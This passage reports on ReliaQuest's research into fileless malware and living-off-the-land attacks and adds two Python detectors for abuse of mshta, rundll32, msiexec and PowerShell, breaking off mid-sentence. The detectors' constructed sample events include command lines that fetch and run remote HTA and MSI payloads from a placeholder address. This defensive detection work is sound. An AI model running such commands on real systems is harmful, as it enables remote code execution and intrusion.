Fileless malware accounts for 86.2% of all detections - ReliaQuest
May 2024 by ReliaQuest
ReliaQuest has published a new report looking at Living off the Land and Fileless malware attacks.
The key details are below, including that fileless malware accounts for 86.2% of all detections and that roughly a quarter of all critical incidents ReliaQuest observed in customer environments involved the use of LotL techniques.
• Most of the critical customer incidents we responded to in 2023 involved fileless malware, accounting for 86.2% of all detections. Many of these intrusions also utilized Living Off the Land (LotL) techniques, abusing legitimate Windows binaries such as Rundll32, Msiexec, and Mshta.
• Fileless malware and LotL techniques help attackers blend in with legitimate activity, making detection difficult. Fileless malware executes in-memory, leaving fewer indicators of suspicious activity. LotL activity leverages legitimate operating-system binaries, which are needed for regular system functions.
• We expect the abuse of fileless malware and LotL activity to continue in 2024 for conducting stealthy cyber operations. ReliaQuest offers detection rules to identify this activity.
• In the interest of security decision-makers and defenders alike, this report contains mitigation recommendations focusing on monitoring LOLBins, registry changes, application control, and the abuse of legitimate Windows tools.
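The report recommends monitoring LOLBins such as Rundll32, Msiexec and Mshta. The following is an added example of what a minimal rule-based check over process-creation telemetry looks like; it is not ReliaQuest's detection content. It assumes Sysmon-style process-creation records (EventID 1 with Image, CommandLine, ParentImage and User fields) represented as dicts, and the events, user names and the 198.51.100.7 address (documentation range) are constructed for the example.

```python
"""Rule-based detection of LOLBin abuse in process-creation telemetry.

Added example built on constructed Sysmon-style process-creation records;
these are not ReliaQuest's detection rules. Each rule pairs one of the
binaries the report names with a command-line pattern that routine use of
that binary rarely produces, so an analyst can triage on the parent and
user rather than on a file hash that fileless tradecraft never leaves.
"""
import re

# (executable name, pattern over the command line, analyst-facing description)
LOLBIN_RULES = [
    ("mshta.exe",
     re.compile(r"https?:|javascript:|vbscript:", re.I),
     "mshta run with a URL or an inline script protocol"),
    ("rundll32.exe",
     re.compile(r"javascript:|\\AppData\\", re.I),
     "rundll32 running script or a DLL from a user-writable profile path"),
    ("msiexec.exe",
     re.compile(r"https?://", re.I),
     "msiexec fetching a package from a remote URL"),
]

# Constructed sample events (not real telemetry); 198.51.100.7 is TEST-NET-2.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://198.51.100.7/update.hta",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": "CORP\\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\tmp1.dll,Start",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i http://198.51.100.7/pkg.msi",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "CORP\\jdoe"},
    # Benign: the Control Panel applet launcher, a routine rundll32 use.
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe"},
    # Benign: a software-deployment install from a local package path.
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Installers\7zip.msi /qn",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "User": "NT AUTHORITY\\SYSTEM"},
]


def image_name(path):
    """Return the lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of alerts (possibly empty) raised by one event."""
    alerts = []
    if event.get("EventID") != 1:          # only process-creation events apply
        return alerts
    exe = image_name(event["Image"])
    for binary, pattern, why in LOLBIN_RULES:
        if exe == binary and pattern.search(event["CommandLine"]):
            alerts.append({"rule": why, "image": exe, "user": event["User"],
                           "parent": image_name(event["ParentImage"]),
                           "cmd": event["CommandLine"]})
    return alerts


def scan(events):
    """Run every rule over every event and collect the alerts in order."""
    hits = []
    for event in events:
        hits.extend(evaluate(event))
    return hits


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['image']}] {a['rule']} | parent={a['parent']} user={a['user']}")
        print(f"    {a['cmd']}")
```

Running the block prints three alerts (the mshta, rundll32 and msiexec events that reference a remote URL or a profile path) and stays silent on the two routine invocations. The parent process is carried into the alert because, for fileless activity, "what launched it" is usually the strongest triage signal available.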
Fileless malware presents many problems for security teams, making it an attractive choice for threat actors:
• Fileless malware, like SocGholish, is harder to detect than traditional malware because it resides solely in memory and exhibits low-observable characteristics (LOCs), effectively evading many standard security measures.
• It manipulates command lines of trusted applications, such as PowerShell, allowing malicious activities to blend in with normal, authorized operations and bypass security measures that typically allowlist these applications.
• Since it leaves no malicious files on the hard drive, fileless malware makes post-incident analysis and attribution more challenging for security teams.
• Remediation and detection are more complex as there are no specific files or traditional malware signatures to target, requiring more sophisticated and resource-intensive methods, like behavioral analysis.
Similarly, many sophisticated threat actors prefer to “live off the land” to reduce the risk of detection. In 2023, roughly a quarter of all critical incidents we observed in customer environments involved the use of LotL techniques. LotL is a popular attack vector for multiple reasons:
• The lack of indicators of compromise (IoCs) associated with LotL activities makes it challenging for defenders to track and categorize malicious behaviors.
• LotL saves resources by not having to invest in the development and deployment of custom tools.
• Many organizations do not have established baselines, making it difficult to detect malicious LotL activity. This means attackers can blend in more easily with normal activities.
• Defenders often face operational challenges such as working in organizational silos and sifting through large volumes of log data to identify malicious activity, making LotL tactics harder to detect.
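The third point above, that organizations without established baselines cannot tell malicious LotL activity from normal use, is the one a detection engineer can act on directly. The following added example (not the report's method) shows the baseline idea in code: it counts which parent-to-child process pairs are routine over a window of benign process-creation events, then flags later launches of watched LOLBins whose parent combination was never seen, or seen too rarely to trust. All events, host names and the 198.51.100.7 address (documentation range) are constructed.

```python
"""Baseline-driven detection of unusual LOLBin launches.

Added example, not ReliaQuest's detection content. A LOLBin whose command
line looks ordinary still stands out when its parent process is one that
never launches it in this environment, so the check keys on the
(parent, child) pair rather than on command-line content.
"""
from collections import Counter

# LOLBins the report names, plus PowerShell, which it cites for command-line abuse.
WATCHED = {"rundll32.exe", "msiexec.exe", "mshta.exe", "powershell.exe"}


def _name(path):
    """Lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ev(parent, child, cmd, host="WS-0101"):
    """Build one constructed process-creation record."""
    return {"ParentImage": parent, "Image": child, "CommandLine": cmd, "Computer": host}


# Constructed benign window: repeated routine launches plus one rare one-off.
BASELINE_WINDOW = (
    [ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
        "rundll32.exe shell32.dll,Control_RunDLL")] * 12
    + [ev(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /V")] * 8
    + [ev(r"C:\Windows\System32\svchost.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell.exe -File C:\Scripts\inventory.ps1")] * 5
    + [ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
          r"mshta.exe C:\Program Files\Vendor\help.hta")] * 1   # below min_count
)

# Constructed new events to evaluate against the baseline.
NEW_EVENTS = [
    ev(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
       r"C:\Windows\System32\mshta.exe",
       "mshta.exe http://198.51.100.7/a.hta", host="WS-0207"),
    ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
       "rundll32.exe shell32.dll,Control_RunDLL"),
    ev(r"C:\Windows\System32\inetsrv\w3wp.exe",
       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Windows\Temp\s.ps1",
       host="WEB-01"),
    ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
       r"mshta.exe C:\Program Files\Vendor\help.hta"),
    ev(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
       "msiexec.exe /V"),
]


def build_baseline(events, min_count=3):
    """Return the set of (parent, child) pairs seen at least min_count times.

    The threshold keeps one-off launches out of the baseline, so a rare pair
    is still reviewed rather than silently allow-listed by a single occurrence.
    """
    counts = Counter((_name(e["ParentImage"]), _name(e["Image"])) for e in events)
    return {pair for pair, n in counts.items() if n >= min_count}


def detect_novel(events, baseline, watched=WATCHED):
    """Flag watched-LOLBin launches whose (parent, child) pair is not baselined."""
    hits = []
    for e in events:
        pair = (_name(e["ParentImage"]), _name(e["Image"]))
        if pair[1] in watched and pair not in baseline:
            hits.append({"parent": pair[0], "child": pair[1],
                         "host": e["Computer"], "cmd": e["CommandLine"]})
    return hits


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_WINDOW)
    for h in detect_novel(NEW_EVENTS, baseline):
        print(f"{h['host']}: {h['parent']} -> {h['child']} not in baseline: {h['cmd']}")
```

With the constructed data, the Office-spawned mshta, the web-server-worker-spawned PowerShell, and the rare explorer-to-mshta pair are flagged, while the routine rundll32 and msiexec launches pass. In practice the baseline would be built per host role (workstation, web server, build agent) from weeks of telemetry, and the `min_count` threshold tuned so that legitimately rare administrative tools are reviewed once and then added deliberately.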
The growing prevalence of these attacks presents a significant challenge to organizations. These threats are stealthy and can remain undetected for long periods. Therefore, these techniques have been popular with sophisticated adversaries, such as nation-state–linked threat actors and advanced persistent threat (APT) groups. Typically, the more sophisticated a threat actor is, the more likely they are to attempt to live off the land and use fileless malware. For example, the China-based threat group “Volt Typhoon”